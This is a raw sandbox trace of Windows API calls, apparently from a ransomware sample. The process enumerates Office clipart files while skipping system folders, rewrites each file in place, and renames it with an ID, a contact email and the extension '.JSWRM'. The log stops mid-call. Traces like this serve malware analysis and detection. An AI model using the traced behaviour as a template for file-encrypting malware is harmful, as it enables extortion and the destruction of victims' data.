[0092.193] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=20098) returned 1 [0092.193] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.193] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4e80) returned 0x24d210 [0092.193] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4e80, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4e80, lpOverlapped=0x0) returned 1 [0092.209] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.209] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4e80, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4e80, lpOverlapped=0x0) returned 1 [0092.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0092.211] CloseHandle (hObject=0x314) returned 1 [0092.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0092.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0092.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0092.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0092.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0092.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0092.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0092.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0092.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0092.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0092.211] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01468_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01468_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01468_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01468_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0092.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0092.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0092.212] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf5d0a20, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf5d0a20, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf5f6d6e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4ada, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA01470_.WMF", cAlternateFileName="")) returned 1 [0092.212] lstrcmpiW (lpString1="NA01470_.WMF", lpString2=".") returned 1 [0092.212] lstrcmpiW (lpString1="NA01470_.WMF", lpString2="..") returned 1 [0092.212] lstrcmpiW (lpString1="NA01470_.WMF", lpString2="...") returned 1 [0092.212] lstrcmpiW (lpString1="NA01470_.WMF", lpString2="windows") returned -1 [0092.212] lstrcmpiW (lpString1="NA01470_.WMF", lpString2="recovery") returned -1 [0092.212] lstrcmpiW (lpString1="NA01470_.WMF", lpString2="perflogs") returned -1 [0092.212] lstrcmpiW (lpString1="NA01470_.WMF", lpString2="documents and settings") returned 1 [0092.212] lstrcmpiW (lpString1="NA01470_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.212] lstrcmpiW (lpString1="NA01470_.WMF", lpString2="system volume information") returned -1 [0092.212] lstrcmpiW (lpString1="NA01470_.WMF", lpString2="msocache") returned 1 [0092.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0092.212] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01470_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.212] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01470_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01470_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0092.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0092.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01470_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01470_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01470_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0092.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0092.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0092.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0092.213] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01470_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01470_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.213] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=19162) returned 1 [0092.213] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4ad0) returned 0x24d210 [0092.214] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4ad0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4ad0, lpOverlapped=0x0) returned 1 [0092.225] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.225] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4ad0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4ad0, lpOverlapped=0x0) returned 1 [0092.226] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0092.226] CloseHandle (hObject=0x314) returned 1 [0092.226] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0092.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.226] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0092.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.226] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0092.226] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0092.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.226] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0092.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.226] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0092.226] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0092.226] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0092.226] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0092.226] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0092.226] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01470_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01470_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01470_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01470_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.227] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0092.227] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0092.227] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0092.227] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf5f6d6e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf5f6d6e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf5f6d6e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2028, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA01472_.WMF", cAlternateFileName="")) returned 1 [0092.227] lstrcmpiW (lpString1="NA01472_.WMF", lpString2=".") returned 1 [0092.227] lstrcmpiW (lpString1="NA01472_.WMF", lpString2="..") returned 1 [0092.227] lstrcmpiW (lpString1="NA01472_.WMF", lpString2="...") returned 1 [0092.227] lstrcmpiW (lpString1="NA01472_.WMF", lpString2="windows") returned -1 [0092.227] lstrcmpiW (lpString1="NA01472_.WMF", lpString2="recovery") returned -1 [0092.227] lstrcmpiW (lpString1="NA01472_.WMF", lpString2="perflogs") returned -1 [0092.227] lstrcmpiW (lpString1="NA01472_.WMF", lpString2="documents and settings") returned 1 [0092.227] lstrcmpiW (lpString1="NA01472_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.227] lstrcmpiW (lpString1="NA01472_.WMF", lpString2="system volume information") returned -1 [0092.227] lstrcmpiW (lpString1="NA01472_.WMF", lpString2="msocache") returned 1 [0092.227] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0092.227] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01472_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.227] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01472_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01472_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.227] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0092.227] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0092.227] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01472_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.227] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01472_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01472_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.228] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0092.228] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0092.228] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0092.228] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.228] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.228] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0092.228] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01472_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01472_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.229] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8232) returned 1 [0092.229] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.229] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2020) returned 0x205850 [0092.229] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x2020, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x2020, lpOverlapped=0x0) returned 1 [0092.231] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.231] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x2020, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x2020, lpOverlapped=0x0) returned 1 [0092.231] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0092.231] CloseHandle (hObject=0x314) returned 1 [0092.231] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0092.231] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.231] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0092.231] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.231] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0092.231] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0092.231] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.231] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0092.231] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.231] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0092.231] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0092.231] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0092.232] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0092.232] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0092.232] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01472_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01472_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01472_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01472_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.232] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0092.232] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0092.232] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0092.232] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1027b233, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1027b233, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102a14ae, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x28ae, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA01473_.WMF", cAlternateFileName="")) returned 1 [0092.233] lstrcmpiW (lpString1="NA01473_.WMF", lpString2=".") returned 1 [0092.233] lstrcmpiW (lpString1="NA01473_.WMF", lpString2="..") returned 1 [0092.233] lstrcmpiW (lpString1="NA01473_.WMF", lpString2="...") returned 1 [0092.233] lstrcmpiW (lpString1="NA01473_.WMF", lpString2="windows") returned -1 [0092.233] lstrcmpiW (lpString1="NA01473_.WMF", lpString2="recovery") returned -1 [0092.233] lstrcmpiW (lpString1="NA01473_.WMF", lpString2="perflogs") returned -1 [0092.233] lstrcmpiW (lpString1="NA01473_.WMF", lpString2="documents and settings") returned 1 [0092.233] lstrcmpiW (lpString1="NA01473_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.233] lstrcmpiW (lpString1="NA01473_.WMF", lpString2="system volume information") returned -1 [0092.233] lstrcmpiW (lpString1="NA01473_.WMF", lpString2="msocache") returned 1 [0092.233] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0092.233] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01473_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.233] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01473_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01473_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.233] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0092.233] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0092.233] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01473_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.233] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01473_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01473_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.233] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0092.233] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0092.233] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0092.233] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.233] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.233] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0092.233] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01473_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01473_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.234] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10414) returned 1 [0092.234] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x28a0) returned 0x24d210 [0092.234] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x28a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x28a0, lpOverlapped=0x0) returned 1 [0092.236] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.236] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x28a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x28a0, lpOverlapped=0x0) returned 1 [0092.236] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0092.236] CloseHandle (hObject=0x314) returned 1 [0092.236] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0092.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.236] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0092.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.236] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0092.236] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0092.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, 